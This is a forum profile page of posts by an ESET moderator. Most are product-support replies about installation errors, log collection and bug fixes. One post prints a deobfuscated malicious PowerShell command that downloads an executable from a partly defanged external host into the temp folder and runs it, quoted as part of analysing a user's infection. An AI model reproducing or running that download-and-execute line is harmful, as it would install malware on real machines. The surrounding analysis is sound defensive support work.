Jump to content

Peter Randziak

ESET Moderators
  • Content Count

  • Joined

  • Last visited

  • Days Won


Everything posted by Peter Randziak

  1. Hello @T3chGuy007 thank you for providing us with the log We checked them and we found: MSI (s) (BC!EC) [08:06:18:420]: Creating MSIHANDLE (422) of type 790531 for thread 8172 ERROR: (preps) Preparing of service failed. So it seems that the agent cannot be stopped for some reason. Please try to install the stand-alone agent on the affected machine and 1. run the installation with lvx parameter 2. Capture the events in the system during the installation with Process monitor with advanced output enabled, after it fails export the log in native pml format 3. Enable blocking of all blocked operations by HIPS in the HIPS setup on the Endpoint Compress the logs, upload them to a safe location and send me and TomasP a PM with download details so we can check it. Regards, P.R.
  2. One more update from the research team. It seems that the original script is base64 encoded and it is subject of our detection as PowerShell/TrojanDownloader.Agent.DV trojan since March 5. Regards, P.R.
  3. Hello @viper37, I got a response from the Dev team. The issue will be fixed in EES v. 7.1.2039 and EES v. 7.0.2108. Fixed build should be available within few weeks. We apologize for the inconvenience caused. Regards, P.R.
  4. Hello @pfnothing and @itman, I forwarded your findings to the lab. When it comes to the script extractions the numbers in {} are indexes to the array of chars in the quotation marks (-f "t","2"," …) @pfnothingI would be great if you can provide us with the script to analyze, ideally via a private message with a reference to this forum topic in an encrypted archive (set the password to infected so it won't be detected on his route to us 🙂 ) Thank you, P.R.
  5. I made the edit even in advance, not to share URL to malicious binary. I send it to samples@eset.com i.e. our research lab and I got this response :-) I'm a tech support guy, so I do not have a mastery in the black magic :-D Yes we tried to download it as well of course, but we didn't succeed either. It might be moved or the request might been filtered by some specific condition on the server. Or it just might got removed / moved by the server operators. I would check the detection logs,... Regards, P.R.
  6. Hello Emiel, glad to hear that, thank you for keeping us posted. P.R.
  7. Hello @T3chGuy007, So can you please provide us with it so we can check it? I found a similar case reported by our QA "Installation failed with error (package=0, error=8257588" ( reference for us P_ESMC-16163) but it should be fixed in the latest version of ESMC, but not sure if it requires the newest agent as well as you have the old one ESET Remote Administrator Agent 6.5.522.0 "This seems to be caused by policy having connection settings. The custom policy in setup causes those settings to be locked, and the ConfigSetServerConnection is trying to set the setting but it's locked by policy so it fails..." May I ask why do you upgrade via the All-in-one installer? I would recommend first to try to upgrade via the Upgrade infrastructure task, as All-in-one primary usage is for deployment, not for upgrading,... Regards, P.R.
  8. Hello @pfnothing after deobfuscation: (new-object System.Net.WebClient).DownloadFile('hXXp://services.enigmasolutions.xyz:2052/scg.exe', $env:TEMP + '\ASfkaop.exe');Start-Process($env:TEMP + '\ASfkaop.exe'); Do you happen to have the scg.exe left in the system? If no you can try to recover it. If yes can you please send me a copy of it in an encrypted archive via a private message to check? Regards, P.R.
  9. Hello @viper37, thank you for providing us with the dump and logs. I briefly checked them and opened a ticket with our dev team in order to investigate the root cause deeply. We will keep you posted. Regards, P.R. tracking note: P_EESW-3267
  10. @Supercows, good, expect a private message from me within few minutes. P.R.
  11. Dear @renekalff sure, I will send you a private message with details in a few moments. Regards, P.R.
  12. Hello @MarcFL congratulations to your new device. Can you please submit a ticket directly from your device for us so we can check the corresponding logs? Thank you, P.R.
  13. @Oliver Hansen, sure, I will contact you by private message in a few moments. Thank you, P.R.
  14. @blaxxz Have you tried to contact the support by phone?
  15. Hello @Haresh2015 , sure, I will send you a private message with details in a few moments. Regards, P.R.
  16. Hello @Daniel Egberts, sure, I will contact you by private message in a few moments. Regards, P.R.
  17. Thank you, I will check them and pass to the dev team, if needed. Peter
  18. Hello @Skynet, good, please keep us posted. There are quite many changes between v.6 and v.7 and moreover this issue might be caused by an updated module, currently we have about 50 of them,... Once the issue reappears we should be able to find quite quickly what's wrong from the logs,... Thank you, P.R.
  19. Hello Stan, thank you for considering our solution and your positive feedback on it. The solution you propose is quite easy, you just need to set up a SMTP relay and equip it with the ESET Mail Security for Linux / FreeBSD. The scenarios are described in the user guide https://download.eset.com/com/eset/apps/business/es/linux/latest/eset_ems_45_userguide_enu.pdf just search for the "relay". Regards, P.R.
  20. Hello @brandobot, good, thank you, I will check them and will reply you by means of the personal message(s). Regards, P.R.
  21. Hello @brandobot, good, thank you for the answers and the logs. I had them checked by my colleague, who has expertise in macOS support and I replied you via the private messages. Regards, P.R.
  22. Hello @brandobot, 1. Does it crash only after the wake-up 2. If yes after each or just sometimes? 3. The issue is exclusive for the new ("t2 chipset macOS laptops (2018 and newer)") systems only? 4. What exactly crashes just the ESET app or entire system? Can you please collect the logs right after the crash and send them to me to check via a private message with a reference to this thread so I can have them checked? Regards, P.R.
  23. Hello @Skynet, 1. so I would advise to install the v.7, with the default settings before the working hours, run manual modules update, do not apply any additional policies via ECMS/ERA. I checked one very similar case you your's and they had deeper scanning set, thus consuming much more resources. 2. Disable "StartUp scan task after user logon" in scheduler 3. Have Process monitor prepared Once the high load starts please record about a minute with the Process monitor (with advanced output enabled) and save it as native .pml log 4. Dump ekrn via the build-in option - Diagnostics - Create diagnostic dump 5. Collect the logs via ESET log Collector 6. You may restore the server's functionality, I assume it shouldn't take more than 3 minutes to collect the 3 logs. In the ticket mentioned the load dropped after about 3 minutes after disabling the real-time file system protection. In case it won't happen with the "StartUp scan task after user logon" in scheduler disabled, you may try to enable it and try to get logs with it. Once you have the logs / any results please pack them, upload to a safe location and send me the download details via private message to check. Please let us know any news regarding this. Thank you in advance, P.R.
  24. Hello @Mehr, may I ask what exact contact method have you used to contact your local support? i.e. URL of the web form you used / e-mail so we can check it. Regards, P.R.
  • Create New...